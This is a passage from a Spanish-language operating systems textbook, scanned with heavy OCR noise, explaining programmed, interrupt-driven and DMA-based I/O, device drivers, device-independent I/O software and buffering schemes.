gura 5-7(b) podemos ver que se ha impreso el primer carácter y que el sistema ha marcado a "B" 
como el siguiente carácter a imprimir. 

Tan pronto como copia el primer carácter a la impresora, el sistema operativo comprueba si la 
impresora está lista para aceptar otro. En general la impresora tiene un segundo registro, que pro¬ 
porciona su estado. El acto de escribir en el registro de datos hace que el estado se convierta en "no 
está lista". Cuando el controlador de la impresora ha procesado el carácter actual, indica su dispo¬ 
nibilidad estableciendo cierto bit en su registro de estado, o colocando algún valor en él. 

En este punto el sistema operativo espera a que la impresora vuelva a estar lista. Cuando eso 
ocurre, imprime el siguiente carácter, como se muestra en la figura 5-7(c). Este ciclo continúa has¬ 
ta que se ha impreso toda la cadena. Después el control regresa al proceso de usuario. 

Las acciones realizadas por el sistema operativo se sintetizan en la figura 5-8. Primero se co¬ 
pian los datos en el kernel. Después el sistema operativo entra a un ciclo estrecho, imprimiéndolos 
caracteres uno a la vez. El aspecto esencial de la E/S programada, que se ilustra con claridad en es¬ 
ta figura, es que después de imprimir un carácter, la CPU sondea en forma continua el dispositivo 
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para ver si está listo para aceptar otro. Este comportamiento se conoce comúnmente como sondeo 
u ocupado en espera. 


copiar_del_usuario{bufer, p, cuenta); 
for {¡=0; i<cuenta; i++) { 

while {*reg_estaclo_impresora !=READY); 
*registro_datos_impresora =p[i]; 

} 

regresar_al_usuario(); 


/* p es el búfer del kernel */ 

/* Itera en cada carácter*/ 

/* Itera hasta que esté lista */ 
/* Imprime un carácter*/ 


Figura 5-8. Cómo escribir una cadena en la impresora usando E/S programada. 


La E/S programada es simple, pero tiene la desventaja de ocupar la CPU tiempo completo has¬ 
ta que se completen todas las operaciones de E/S. Si el tiempo para "imprimir" un carácter es muy 
corto (debido a que todo lo que hace la impresora es copiar el nuevo carácter a un búfer interno), 
entonces está bien usar ocupado en espera. Además, en un sistema incrustado o embebido, dondela 
CPU no tiene nada más que hacer, ocupado en espera es razonable. Sin embargo, en sistemas más 
complejos en donde la CPU tiene otros trabajos que realizar, ocupado en espera es ineficiente. Se 
necesita un mejor método de E/S. 

5.2.3 E/S controlada por interrupciones 

Ahora vamos a considerar el caso de imprimir en una impresora que no coloca los caracteres en un 
búfer, sino que imprime cada uno a medida que va llegando. Si la impresora puede imprimir (por 
ejemplo,) 100 caracteres/seg, cada carácter requiere 10 mseg para imprimirse. Esto significa que 
después de escribir cada carácter en el registro de datos de la impresora, la CPU estará en un ciclo 
de inactividad durante 10 mseg, esperando a que se le permita imprimir el siguiente carácter. Este 
tiempo es más que suficiente para realizar un cambio de contexto y ejecutar algún otro proceso du¬ 
rante los 10 mseg que, de otra manera, se desperdiciarían. 

La forma de permitir que la CPU haga algo más mientras espera a que la impresora esté lista es 
utilizar interrupciones. Cuando se realiza la llamada al sistema para imprimir la cadena, el búfer se 
copia en espacio de kernel (como vimos antes) y el primer carácter se copia a la impresora, tan pron¬ 
to como esté dispuesta para aceptar un carácter. En ese momento, la CPU llama al planificador y se 
ejecuta algún otro proceso. El proceso que pidió imprimir la cadena se bloquea hasta que se haya im¬ 
preso toda la cadena. El trabajo realizado en la llamada al sistema se muestra en la figura 5-9(a). 

Cuando la impresora ha impreso el carácter, y está preparada para aceptar el siguiente, genera 
una interrupción. Esta interrupción detiene el proceso actual y guarda su estado. Después se ejecu¬ 
ta el procedimiento deservicio de interrupciones de la impresora. Una versión cruda de este código se 
muestra en la figura 5-9(b). Si no hay más caracteres por imprimir, el manejador de interrupciones rea¬ 
liza cierta acción para desbloquear al usuario. En caso contrario, imprime el siguiente carácter, reco¬ 
noce la interrupción y regresa al proceso que se estaba ejecutando justo antes de la interrupción, que 
continúa desde donde se quedó. 
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copiar_del_usuario{bufer, p, cuenta); 

habilitar_intermpciones{); 

while {*reg_estaclo_impresora !=READY); 

*registro_clatos_impresora = p[0]; 

planificadorO; 


if (cuenta==0) { 
desbloquear_usuario{); 

}else { 

*registro_datos_impresora =p[i]; 
cuenta=cuenta - 1; 
i = i +1; 

} 

reconocer_interrupcion{); 

regresar_de_interrupcion{); 


(a) (b) 

Figura 5-9. Cómo escribir una cadena a ia impresora, usando E/S controiada por inte¬ 
rrupciones. (a) Código que se ejecuta ai momento en que se hace una iiamada ai siste¬ 
ma para imprimir, (b) Procedimiento de servicio de interrupciones para ia impresora. 


5.2.4 E/S mediante el uso de DMA 

Una obvia desventaja de la E/S controlada por interrupciones es que ocurre una interrupción en 
cada carácter. Las interrupciones requieren tiempo, por lo que este esquema desperdicia cierta can¬ 
tidad de tiempo de la CPU. U na solución es utilizar DM A. Aquí la idea es permitir que el contro¬ 
lador de DM A alimente los caracteres a la impresora uno a la vez, sin que la CPU se moleste. En 
esencia, el DMA es E/S programada, sólo que el controlador de DMA realiza todo el trabajo 
en vez de la CPU principal. Esta estrategia requiere hardware especial (el controlador de DMA) 
pero libera la CPU durante la E/S para realizar otro trabajo. En la figura 5-10 se muestra un es¬ 
quema del código. 


copiar_del_usuario{bufer, p, cuenta); reconocer_interrupcion{); 

establecer_controlaclor_DMA{); desbloquear_usuario{); 

planificadorO; regresar_de_interrupcion{); 

Figura 5-10. Cómo imprimir una cadena mediante ei uso de DMA. (a) Código que se 
ejecuta cuando se hace ia iiamada ai sistema para imprimir, (b) Procedimiento de ser¬ 
vicio de interrupciones. 


La gran ganancia con DMA es reducir el número de interrupciones, de una por cada carácter a 
una por cada búfer impreso. Si hay muchos caracteres y las interrupciones son lentas, esto puede 
ser una gran mejora. Por otra parte, el controlador de DM A es comúnmente más lento que la CPU 
principal. Si el controlador de DM A no puede controlar el dispositivo a toda su velocidad, o si la 
CPU por lo general no tiene nada que hacer mientras espera la interrupción de DM A, entonces pue¬ 
de ser mejor utilizar la E/S controlada por interrupción o incluso la E/S programada. De todas for¬ 
mas, la mayor parte del tiempo vale la pena usar DMA. 
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5.3 CAPAS DEL SOFTWARE DE E/S 

Por lo general, el software de E/S se organiza en cuatro capas, como se muestra en la figura 5-11. 
Cada capa tiene una función bien definida que realizar, y una interfaz bien definida para los nive¬ 
les adyacentes. La funcionalidad y las interfaces difieren de un sistema a otro, por lo que el análi¬ 
sis que veremos a continuación, que examina todas las capas empezando desde el inferior, no es 
específico de una sola máquina. 



Software de E/S de capa de usuario 


Software de sistema operativo independiente dei dispositivo 

Controladores de dispositivos 

Manejadores de interrupciones 

Hardware 


Figura 5-11. Capas del sistema de software de E/S. 


5.3.1 Manejadores de interrupciones 

A unque la E/S programada es útil algunas veces, para la mayor parte de las operaciones de E/S las 
interrupciones son un hecho incómodo de la vida y no se pueden evitar. Deben ocultarse en la pro¬ 
fundidad de las entrañas del sistema operativo, de manera que éste sepa lo menos posible de ellas. 
La mejor manera de ocultarlas es hacer que el controlador que inicia una operación de E/S se blo¬ 
quee hasta que se haya completado la E/S y ocurra la interrupción. El controlador se puede bloquear 
a sí mismo realizando una llamada a down en un semáforo, una llamada a wait en una variable de 
condición, una llamada a receive en un mensaje o algo similar, por ejemplo. 

Cuando ocurre la interrupción, el procedimiento de interrupciones hace todo lo necesario para po¬ 
der manejarla. Después puede desbloquear el controlador que la inició. En algunos casos sólo com¬ 
pletará up en un semáforo. En otros casos realizará una llamada a signai en una variable de 
condición en un monitor. En otros más enviará un mensaje al controlador bloqueado. En todos los 
casos, el efecto neto de la interrupción será que un controlador que estaba bloqueado podrá ejecu¬ 
tarse ahora. Este modelo funciona mejor si los controladores están estructurados como procesos del 
kernel, con sus propios estados, pilas y contadores del programa. 

Desde luego que en realidad esto no están simple. Procesar una interrupción no es cuestión de 
sólo tomar la interrupción, llamar a up en algún semáforo y después ejecutar una instrucción iret 
para regresar de la interrupción al proceso anterior. Hay mucho más trabajo involucrado para el sis¬ 
tema operativo. A hora veremos un esquema de este trabajo como una serie de pasos que se deben 
llevar a cabo en el software, una vez que se haya completado la interrupción de hardware. Hay que 
recalcar que los detalles dependen mucho del sistema, por lo que algunos de los pasos que se listan 
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a continuación tai vez no sean necesarios en una máquina específica, y tai vez se requieran otros 
que no estén iistados. Además, ios pasos que se iievan a cabo pueden estar en distinto orden en ai- 
gunas máquinas. 

1. Guardar ios registros (inciuyendo ei PSW) que no han sido guardados por ei hardware de 
ia interrupción. 

2. Estabiecer un contexto para ei procedimiento de servicio de interrupciones. Para eiio tai 
vez sea necesario estabiecer ei TLB, ia M M U y una tabia de páginas. 

3. Estabiecer una piia para ei procedimiento de servicio de interrupciones. 

4. Reconocer ei controiador de interrupciones. Si no hay un controiador de interrupciones 
centraiizado, rehabiiitar ias interrupciones. 

5. Copiar ios registros desde donde se guardaron (posibiemente en aiguna piia) a ia tabia de 
procesos. 

6. Ejecutar ei procedimiento de servicio de interrupciones. Éste extraerá información de ios 
registros dei controiador de dispositivos que provocó ia interrupción. 

7. Eiegir cuái proceso ejecutar a continuación. Si ia interrupción ha ocasionado que cierto 
proceso deaita prioridad que estaba bioqueado cambie ai estado iisto, puede eiegirse para 
ejecutado en ese momento. 

8. Estabiecer ei contexto de ia M M U para ei proceso que se va a ejecutar a continuación. 
También puede ser necesario estabiecer un TLB. 

9. Cargar ios registros dei nuevo proceso, inciuyendo su PSW. 

10. Empezar a ejecutar ei nuevo proceso. 

Como se puede ver, ei procesamiento de interrupciones no carece de importancia. También ocupa 
un considerabie número de instrucciones de ia CPU, en especiai en máquinas en ias que hay me¬ 
moria virtuai y es necesario estabiecer tabias de páginas, o se tiene que guardar ei estado de ia 
M M U (por ejempio, ios bits R y M ). En aigunas máquinas, ei TLB y ia caché de ia CPU tai vez 
también tengan que manejarse ai cambiar entre ios modos de usuario y de kernei, io cuai requiere 
cicios de máquina adicionaies. 

5.3.2 Drivers de dispositivos 

Ai principio de este capítuio anaiizamos io que hacen ios drivers. Vimos que cada controiador tie¬ 
ne ciertos registros de dispositivos que se utiiizan para darie comandos o ciertos registros de dispo¬ 
sitivos que se utiiizan para ieer su estado, o ambos. Ei número de registros de dispositivos y ia 
naturaieza de ios comandos varían radicaimente de un dispositivo a otro. Por ejempio, un driver de 
ratón tiene que aceptar información dei ratón que ie indica qué tanto se ha despiazado y cuái es bo¬ 
tones están oprimidos en un momento dado. Por ei contrario, un driver de disco tai vez tenga que 
saber todo acerca de ios sectores, pistas, ciiindros, cabezas, movimiento dei brazo, ios propuisores 
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del motor, los tiempos de asentamiento de i as cabezas y todos ios demás mecanismos para hacer 
que ei disco funcione en forma apropiada. Obviamente, estos drivers serán muy distintos. 

Como consecuencia, cada dispositivo de E/S conectado a una computadora necesita cierto có¬ 
digo específico para controiario. Este código, conocido como driver, es escrito por ei fabricante dei 
dispositivo y se inciuye junto con ei mismo. Como cada sistema operativo necesita sus propios dri¬ 
vers, ios fabricantes de dispositivos por io común ios proporcionan para varios sistemas operativos 
popuiares. 

Cada driver maneja un tipo de dispositivo o, a io más, una ciase de dispositivos estrechamen¬ 
te reiacionados. Por ejempio, un driver de disco SCSI puede manejar por lo general varios discos 
SCSI de distintos tamaños y velocidades, y tal vez un CD-ROM SCSI también. Por otro lado, un 
ratón y una palanca de mandos son tan distintos que por lo general se requieren controladores dife¬ 
rentes. Sin embargo, no hay una restricción técnica en cuanto a que un driver controle varios dis¬ 
positivos no relacionados. Simplemente no es una buena idea. 

Para poder utilizar el hardware del dispositivo (es decir, los registros del controlador físico), el 
driver por lo general tiene que formar parte del kernel del sistema operativo, cuando menos en las 
arquitecturas actuales. En realidad es posible construir controladores que se ejecuten en el espacio 
de usuario, con llamadas al sistema para leer y escribir en los registros del dispositivo. Este diseño 
aísla al kernel de los controladores, y a un controlador de otro, eliminando una fuente importante 
de fallas en el sistema: controladores con errores que interfieren con el kernel de una manera u otra. 
Para construir sistemas altamente confiables, ésta es, en definitiva, la mejor manera de hacerlo. Un 
ejemplo de un sistema donde los controladores de dispositivos se ejecutan como procesos de usua¬ 
rio es MINIX 3. Sin embargo, como la mayoría de los demás sistemas operativos de escritorio es¬ 
peran que los controladores se ejecuten en el kernel, éste es el modelo que consideraremos aquí. 

Como los diseñadores de cada sistema operativo saben qué piezas de código (drivers) escritas 
por terceros se instalarán en él, necesita tener una arquitectura que permita dicha instalación. Esto 
implica tener un modelo bien definido de lo que hace un driver y la forma en que interactúa con el 
resto del sistema operativo. Por lo general, los controladores de dispositivos se posicionan debajo 
del resto del sistema operativo, como se ilustra en la figura 5-12. 

Generalmente los sistemas operativos clasifican los controladores en una de un pequeño nú¬ 
mero de categorías. Las categorías más comunes son los dispositivos de bioquecomo los discos, 
que contienen varios bloques de datos que se pueden direccionar de manera independiente, y los 
dispositivos de carácter como los teclados y las impresoras, que generan o aceptan un flujo de 
caracteres. 

La mayoría délos sistemas operativos definen una interfaz estándar que todos los controladores 
de bloque deben aceptar. Estas interfaces consisten en varios procedimientos que el resto del siste¬ 
ma operativo puede llamar para hacer que el controlador realice un trabajo para él. Los procedimien¬ 
tos ordinarios son los que se utilizan para leer un bloque (dispositivo de bloque) o escribir una cadena 
de caracteres (dispositivo de carácter). 

En algunos sistemas, el sistema operativo es un solo programa binario que contiene compila¬ 
dos en él todos los controladores que requerirá. Este esquema fue la norma durante años con los sis¬ 
temas UNIX, debido a que eran ejecutados por centros de computadoras y los dispositivos de E/S 
cambiaban pocas veces. Si se agregaba un nuevo dispositivo, el administrador del sistema simple¬ 
mente recompilaba el kernel con el nuevo controlador para crear un nuevo binario. 
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Figura 5-12. Posicionamiento lógico del software controlador de dispositivos. En rea¬ 
lidad toda la comunicación entre el software controlador y los controladores de dispo¬ 
sitivos pasa a través del bus. 


Con la llegada de las computadoras personales y la multitud de dispositivos de E/S, este mo¬ 
delo ya no era funcional. Pocos usuarios son capaces devolver a compilar o vincular el kernei, aun 
si tienen el código fuente o los módulos de código objeto, que no siempre es el caso. En vez de el lo, 
los sistemas operativos (empezando con M S-DOS) se inclinaron por un modelo en el que el con¬ 
trolador se carga en forma dinámica en el sistema durante la ejecución. Los diferentes sistemas 
manejan la carga de controladores en distintas formas. 

Un controlador de dispositivo tiene varias funciones. La más obvia es aceptar peticiones abs¬ 
tractas de lectura y escritura del software independiente del dispositivo que está por encima de 
él, y ver que se lleven a cabo. Pero también hay otras tantas funciones que deben realizar. Por ejem¬ 
plo, el controlador debe inicializar el dispositivo, si es necesario. También puede tener que admi¬ 
nistrar sus propios requerimientos y eventos del registro. 

M uchos tipos de controladores de dispositivos tienen una estructura general similar. U n con¬ 
trolador ordinario empieza por comprobar los parámetros de entrada para ver si son válidos. De 
no ser así se devuelve un error. Si son válidos tal vez sea necesaria una traducción de términos 
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abstractos a concretos. Para un controlador de disco, esto puede significar tener que convertir un 
número de bioque iineai en ios números de cabeza, pista, sector y ciiindro para ia geometría dei 
disco. 

A continuación, ei controiador puede comprobar si ei dispositivo se encuentra en uso. De ser 
así, ia petición se pondrá en coia para procesada después. Si ei dispositivo está inactivo, ei estado 
dei hardware se examinará para ver si ia petición se puede manejaren ese momento. Tai vez sea ne¬ 
cesario encender ei dispositivo o iniciar un motor para que puedan empezar ias transferencias. Una 
vez que ei dispositivo esté encendido y iisto para trabajar, puede empezar ei controi en sí. 

Controiar ei dispositivo significa enviarie una secuencia de comandos. Ei controiador es ei iu- 
gar en donde se determina ia secuencia de comandos, dependiendo de io que se deba hacer. U na vez 
que ei controiador sabe qué comandos va a emitir, empieza a escribidos en ios registros de dispo¬ 
sitivo dei controiador. Después de escribir cada comando para ei controiador, tai vez sea necesario 
comprobar si ei controiador aceptó ei comando y está preparado para aceptar ei siguiente. Esta se¬ 
cuencia continúa hasta que se hayan emitido todos ios comandos. A igunos controiadores pueden re¬ 
cibir una iista de comandos (en memoria) y se Íes puede indicar que ios procesen todos por sí 
mismos, sin necesidad de ayuda dei sistema operativo. 

Una vez que se han emitido ios comandos, sedará una dedos situaciones. En muchos casos ei 
controiador de dispositivos debe esperar hasta que ei controiador reaiice cierto trabajo para éi, por 
io que se bioquea a sí mismo hasta que iiegue ia interrupción para desbioqueario. Sin embargo, en 
otros casos ia operación termina sin retraso, por io que ei controiador no necesita bioquearse. Co¬ 
mo ejempio de esta úitima situación, para despiazar ia pantaiia en modo de carácter se requiere es¬ 
cribir sóio unos cuantos bytes en ios registros dei controiador. No es necesario ningún tipo de 
movimiento mecánico, por io que toda ia operación se puede compietar en nanosegundos. 

En ei primer caso, ei controiador bioqueado será despertado por ia interrupción. En ei segundo 
caso nunca pasará ai estado inactivo. De cuaiquier forma, una vez que se ha compietado ia opera¬ 
ción, ei controiador debe comprobar si hay errores. Si todo está bien, ei controiador puede hacer que 
pasen datos ai software independiente dei dispositivo (por ejempio, un bioque que se acaba deieer). 
Por úitimo, devueive cierta información de estado para reportar ios errores de vueita ai que io iia- 
mó. Si hay otras peticiones en ia coia, ahora se puede seieccionar e iniciar una de eiias. Si no hay 
nada en ia coia, ei controiador se bioquea en espera de ia siguiente petición. 

Este modeio simpie es sóio una aproximación a ia reaiidad. M uchos factores hacen ei código 
mucho más compiicado. Por una parte, un dispositivo de E/S puede compietar su operación mien¬ 
tras haya un controiador en ejecución, con io cuai se interrumpe ei controiador. La interrupción pue¬ 
de hacer que se ejecute un controiador de dispositivo. De hecho, puede hacer que ei controiador 
actuai se ejecute. Por ejempio, mientras ei controiador de red está procesando un paquete entrante, 
puede iiegar otro paquete. En consecuencia, un controiador tiene que ser reentrante, io cuai signi¬ 
fica que un controiador en ejecución tiene que esperar a ser iiamado una segunda vez antes de que 
se haya compietado ia primera iiamada. 

En un sistema con "conexión en caiiente" es posibie agregar o eiiminar dispositivos mientras 
ia computadora está en ejecución. Como resuitado, mientras un controiador está ocupado ieyendo 
de aigún dispositivo, ei sistema puede informarie que ei usuario ha quitado de manera repentina ese 
dispositivo dei sistema. No sóio se debe abortar i a transferencia actuai de E/S sin dañar ninguna es¬ 
tructura de datos dei kernei, sino que cuaiquier petición pendiente dei ahora desaparecido disposi- 
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tivo debe el i minarse también, con cuidado, del sistema, avisando a los que hicieron la llamada. Ade¬ 
más, la adición inesperada de nuevos dispositivos puede hacer que el kernel haga malabares con los 
recursos (por ejemplo, las líneas de petición de interrupciones), quitando los anteriores al controla¬ 
dor y dándole nuevos recursos en vez de los otros. 

El controlador no puede hacer llamadas al sistema, pero a menudo necesita interactuar con el 
resto del kernel. Por lo general se permiten llamadas a ciertos procedimientos del kernel. Por ejem¬ 
plo, comúnmente hay llamadas para asignar y desasignar páginas fijas de memoria para usarlas co¬ 
mo búferes. Otras llamadas útiles se necesitan para administrar la M M U, los temporizadores, el 
controlador de DMA, el controlador de interrupciones, etcétera. 


5.3.3 Software de E/S independiente del dispositivo 

A unque parte del software de E/S es específico para cada dispositivo, otras partes de éste son inde¬ 
pendientes de los dispositivos. El límite exacto entre los controladores y el software independiente 
del dispositivo depende del sistema (y del dispositivo), debido a que ciertas funciones que podrían 
realizarse de una manera independiente al dispositivo pueden realizarse en los controladores, por 
eficiencia u otras razones. Las funciones que se muestran en la figura 5-13 se realizan comúnmen¬ 
te en el software independiente del dispositivo. 


Interfaz uniforme para controladores de dispositivos 
Uso de búfer 
Reporte de errores 

Asignar y liberar dispositivos dedicados 

Proporcionar un tamaño de bloque independiente del dispositivo 


Figura 5-13. Funciones del software de E/S independiente del dispositivo. 


La función básica del software independiente del dispositivo es realizar las funciones de E/S 
que son comunes para todos los dispositivos y proveer una interfaz uniforme para el software a ni¬ 
vel de usuario. A continuación analizaremos las cuestiones antes mencionadas con más detalle. 

I nterfaz uniforme para los controladores de software de dispositivos 

Una importante cuestión en un sistema operativo es cómo hacer que todos los dispositivos de E/S 
y sus controladores se vean más o menos iguales. Si los discos, las impresoras, los teclados, etc., 
se conectan de distintas maneras, cada vez que llegue un nuevo dispositivo el sistema operativo de¬ 
berá modificarse para éste. No es conveniente tener que modificar el sistema operativo para cada 
nuevo dispositivo. 

U n aspecto de esta cuestión es la interfaz entre los controladores de dispositivos y el resto del 
sistema operativo. En la figura 5-14(a) ilustramos una situación en la que cada controlador de dis- 
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positivo tiene una interfaz distinta con ei sistema operativo. Lo que esto significa es que ias funcio¬ 
nes de controiador disponibies para que ei sistema pueda iiamarias difieren de un controiador a otro. 
Además, podría significar que ias funciones de kernei queei controiador necesita también difieren 
de controiador en controiador. En conjunto, quiere decir que i a interfaz para cada nuevo controia¬ 
dor requiere mucho esfuerzo de programación. 




Controlador Controlador Controlador Controlador Controlador Controlador 

de disco SATA de disco IDE de disco SCSI de disco SATA de disco IDE de disco SCSI 


(a) 


(b) 


Figura 5-14. (a) Sin una interfaz de controlador estándar, (b) Con una interfaz de con¬ 
trolador estándar. 


Por el contrario, en la figura 5-14(b) podemos ver un diseño distinto, en el que todos los con¬ 
trol adores tienen la misma interfaz. A hora es mucho más fácil conectar un nuevo controlador, siem¬ 
pre y cuando sea compatible con su interfaz. Esto también significa que los escritores de los 
controladores saben lo que se espera de ellos. En la práctica no todos los dispositivos son absoluta¬ 
mente idénticos, pero por lo general hay sólo un pequeño número de tipos de dispositivos, e inclu¬ 
so éstos en general son casi iguales. 

La manera en que funciona es la siguiente. Para cada clase de dispositivos, como los discos o 
las impresoras, el sistema operativo define un conjunto de funciones que el controlador debe pro¬ 
porcionar. Para un disco, estas funciones incluyen naturalmente la lectura y la escritura, pero tam¬ 
bién encender y apagar la unidad, aplicar formato y otras cosas relacionadas con los discos. A 
menudo, el controlador contiene una tabla con apuntadores a sí mismo para estas funciones. Cuan¬ 
do se carga el controlador, el sistema operativo registra la dirección de esta tabla de apuntadores a 
funciones, por lo que cuando necesita llamar a una de las funciones, puede hacer una llamada indi¬ 
recta a través de esta tabla. Esta tabla de apuntadores a funciones define la interfaz entre el contro¬ 
lador y el resto del sistema operativo. Todos los dispositivos de una clase dada (discos, impresoras, 
etc.) deben obedecerla. 

Otro aspecto detener una interfaz uniforme es la forma en que se nombran los dispositivos. El 
software independiente del dispositivo se hace cargo de asignar nombres de dispositivo simbólicos 
al controlador apropiado. Por ejemplo, en UNIX el nombre de un dispositivo como/dev/diskO espe¬ 
cifica de manera única el nodo-i para un archivo especial, y este nodo-i contiene el número mayor 
de dispositivo, que se utiliza para localizar el controlador apropiado. El nodo-i también contiene 
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el número menor de dispositivo, que se pasa como un parámetro al controlador para poder espe¬ 
cificar i a unidad que se va a ieer o escribir. Todos ios dispositivos tienen números mayores y me¬ 
nores, y para acceder a todos ios controiadores se utiiiza ei número mayor de dispositivo para 
seiaccionar ei controiador. 

La protección está muy reiacionada con ia denominación. ¿Cómo evita ei sistema que ios usua¬ 
rios accedan a dispositivos que tienen prohibido utiiizar? Tanto en UNIX como en Windows, ios dis¬ 
positivos aparecen en ei sistema de archivos como objetos con nombre, io cuai significa que ias 
regias de protección ordinarias para ios archivos también se apiican a ios dispositivos de E/S. Así, ei 
administrador dei sistema puede estabiecer ios permisos apropiados para cada dispositivo. 

Uso de búfer 

Ei uso de búfer es otra cuestión, tanto para ios dispositivos de bioquecomo ios de carácter, por una 
variedad de razones. Para ver una de eiias, considere un proceso que desea ieer datos de un módem. 
Una posibie estrategia para iidiarcon ios caracteres entrantes es hacer que ei proceso de usuario rea- 
iice una iiamada ai sistema read y se bioqueeen espera de un carácter. Cada carácter que iiega pro¬ 
duce una interrupción. Ei procedimiento de servicio de interrupciones entregad carácter ai proceso 
de usuario y io desbioquea. Después de coiocar ei carácter en aiguna parte, ei proceso iee otro ca¬ 
rácter y se bioquea de nuevo. Este modeio se indica en ia figura 5-15(a). 


Proceso de usuario 





(a) (b) (c) 



Figura 5-15. (a) Entrada sin búfer. (b) Uso de búfer en espacio de usuario, (c) Uso de 
búfer en el kernel, seguido de la acción de copiar al espacio de usuario, (d) Uso de do¬ 
ble búfer en el kernel. 


El problema con esta forma de hacer las cosas es que el proceso de usuario tiene que iniciarse 
por cada carácter entrante. Permitir que un proceso se ejecute muchas veces durante tiempos cortos 
de ejecución es ineficiente, por lo que este diseño no es bueno. 

En la figura 5-15(b) se muestra una mejora. Aquí el proceso de usuario proporciona un búfer de 
n caracteres en espacio de usuario y realiza una lectura de n caracteres. El procedimiento de servicio 
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de interrupciones coioca ios caracteres entrantes en este búfer hasta que se iiena. Después despierta ai 
proceso de usuario. Este esquema es mucho más eficiente que ei anterior, pero tiene una desventaja: 
¿qué ocurre si ei búfer se pagina cuando iiega un carácter? Ei búfer se podría bioquear en ia memo¬ 
ria, pero si muchos procesos empiezan a bioquear páginas en memoria, se reducirá ia reserva de 
páginas disponibies y se degradará ei rendimiento. 

Otro método más es crear un búfer dentro dei kernei y hacer que ei manejador de interrupcio¬ 
nes coi oque ahí ios caracteres, como se muestra en ia figura 5-15(c). Cuando este búfer está iieno, 
se trae ia página con ei búfer de usuario en caso de ser necesario, y ei búfer se copia ahí en una ope¬ 
ración. Este esquema es mucho más eficiente. 

Sin embargo, inciuso este esquema presenta un inconveniente: ¿Oué ocurre con ios caracteres 
que iiegan mientras se está trayendo dei disco ia página con ei búfer de usuario? Como ei búfer es¬ 
tá iieno, no hay iugar en dónde ponerios. Una soiución es tener un segundo búfer de kernei. Una 
vez que se iiena ei primero, pero antes de que se haya vaciado, se utiiiza ei segundo como se mues¬ 
tra en ia figura 5-15(d). Cuando se iiena ei segundo búfer, está disponibie para copiado ai usuario 
(suponiendo que ei usuario io haya pedido). M ientras ei segundo búfer se copia ai espacio de usua¬ 
rio, ei primero se puede utiiizar para nuevos caracteres. De esta forma, ios dos búferes toman tur¬ 
nos: mientras uno se copia ai espacio de usuario, ei otro está acumuiando nuevos datos de entrada. 
U n esquema de uso de búferes como éste se conoce como uso de doble búfer. 

Otra forma de uso de búfer que se utiiiza ampiiamente es ei búfer circular. Consiste en una 
región de memoria y dos apuntadores. Un apuntador apunta a ia siguiente paiabra iibre, en donde 
se pueden coiocar nuevos datos. Ei otro apuntador apunta a ia primera paiabra de datos en ei búfer 
que todavía no se ha removido. En muchas situaciones, ei hardware avanza ei primer apuntador a 
medida que agrega nuevos datos (por ejempio, ios que acaban de iiegar de ia red) y ei sistema ope¬ 
rativo avanza ei segundo apuntador a medida que eiimina y procesa datos. Ambos apuntadores re¬ 
gresan a ia parte finai después de iiegar a ia parte superior. 

Ei uso de búfer es también importante en ia saiida. Por ejempio, considere cómo se envían da¬ 
tos ai módem sin uso de búfer mediante ei modeio de ia figura 5-15(b). Ei proceso de usuario eje¬ 
cuta una iiamada ai sistema write para imprimir n caracteres. Ei sistema tiene dos opciones en este 
punto. Puede bioquear ei usuario hasta que se hayan escrito todos ios caracteres, pero se podría re¬ 
querir mucho tiempo a través de una iínea teiefónica ienta. También podría iiberar de inmediato ai 
usuario y reaiizar ia operación de E/S mientras ei usuario reaiiza unos cáicuios más, pero esto pro¬ 
duce un probiema aún peor: ¿Cómo sabe ei proceso de usuario que se ha compietado ia saiida y 
puede reutiiizar ei búfer? Ei sistema podría generar una señai o interrupción de software, pero ese 
estiio de programación es difícii y está propenso a condiciones de competencia. Una mucho mejor 
soiución es que ei kernei copie ios datos a un búfer, de manera simiiar a ia figura 5-15(c) (pero en 
sentido opuesto), y que desbioqueeai que hizo ia iiamada de inmediato. Entonces no importa cuán¬ 
do se haya compietado ia operación de E/S. Ei usuario es iibre de reutiiizar ei búfer ai instante en 
que se desbioquea. 

Los búferes constituyen una técnica muy utiiizada; ésta también tiene una desventaja. Si ios da¬ 
tos se coiocan en búfer demasiadas veces, ei rendimiento se reduce. Por ejempio, considere ia red 
de ia figura 5-16. Aquí un usuario reaiiza una iiamada ai sistema para escribir en ia red. Ei kernei 
copia ei paquete a un búfer de kernei para permitir que ei usuario proceda de inmediato (paso 1). 
En este punto, ei programa de usuario puede reutiiizar ei búfer. 


SECCION 5.3 


CAPAS DEL SOFTWARE DE E/S 


357 


Espacio ) 
de usuarioi 


Espacio 
de kernei ‘ 


Proceso de usuario 



Red 


Figura 5-16. El trabajo en red puede involucrar muchas copias de un paquete. 


Cuando se hace la llamada al controlador, copia el paquete al controlador para enviarlo como 
salida (paso 2). La razón por la que no envía directamente al cable desde la memoria kernei es que 
una vez iniciada la transmisión del paquete, debe continuar a una velocidad uniforme. El controla¬ 
dor no puede garantizar que pueda llegar a la memoria a una velocidad uniforme, debido a que los 
canales de DMA y otros dispositivos de E/S pueden estar robando muchos ciclos. Si no se obtiene 
una palabra a tiempo se podría arruinar el paquete. Al colocar en búfer el paquete dentro del con¬ 
trolador se evita este problema. 

Una vez que se ha copiado el paqueteen el búfer interno del controlador, se copia hacia la red 
(paso 3). Los bits llegan al receptor poco después de haber sido enviados, por lo que justo después 
de enviar el último bit, éste llega al receptor, donde el paquete se ha colocado en un búfer en el con¬ 
trolador. A continuación, el paquete se copia al búfer del kernei del receptor (paso 4). Por último se 
copia al búfer del proceso receptor (paso 5); generalmente, el receptor envía después un reconoci¬ 
miento. Cuando el emisor recibe el reconocimiento, puede enviar el segundo paquete. Sin embar¬ 
go, debe quedar claro que todo este proceso de copia reduce la velocidad de transmisión de manera 
considerable, ya que todos los pasos se deben llevar a cabo en forma secuencial. 


Reporte de errores 

Los errores son mucho más comunes en el contexto de la E/S que en otros. Cuando ocurren, el sis¬ 
tema operativo debe manejarlos de la mejor manera posible. M uchos errores son específicos de ca¬ 
da dispositivo y el controlador apropiado debe manejarlos, pero el marco de trabajo para el manejo 
de errores es independiente del dispositivo. 

Los errores de programación son una clase de errores de E/S. Éstos ocurren cuando un proce¬ 
so pide algo imposible, como escribir en un dispositivo de entrada (teclado, escáner, ratón, etc.) o 
leer de un dispositivo de salida (una impresora o un plotter, por ejemplo). Otros errores son propor- 
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clonar una dirección de búfer inválida o algún otro parámetro, y especificar un dispositivo inválido 
(por ejemplo, el disco 3 cuando el sistema sólo tiene dos), entre otros. La acción a tomar en estos 
errores es simple: sólo se reporta un código de error al que hizo la llamada. 

Otra clase de errores son losdeE/S reales: por ejemplo, tratar de escribir un bloque de disco da¬ 
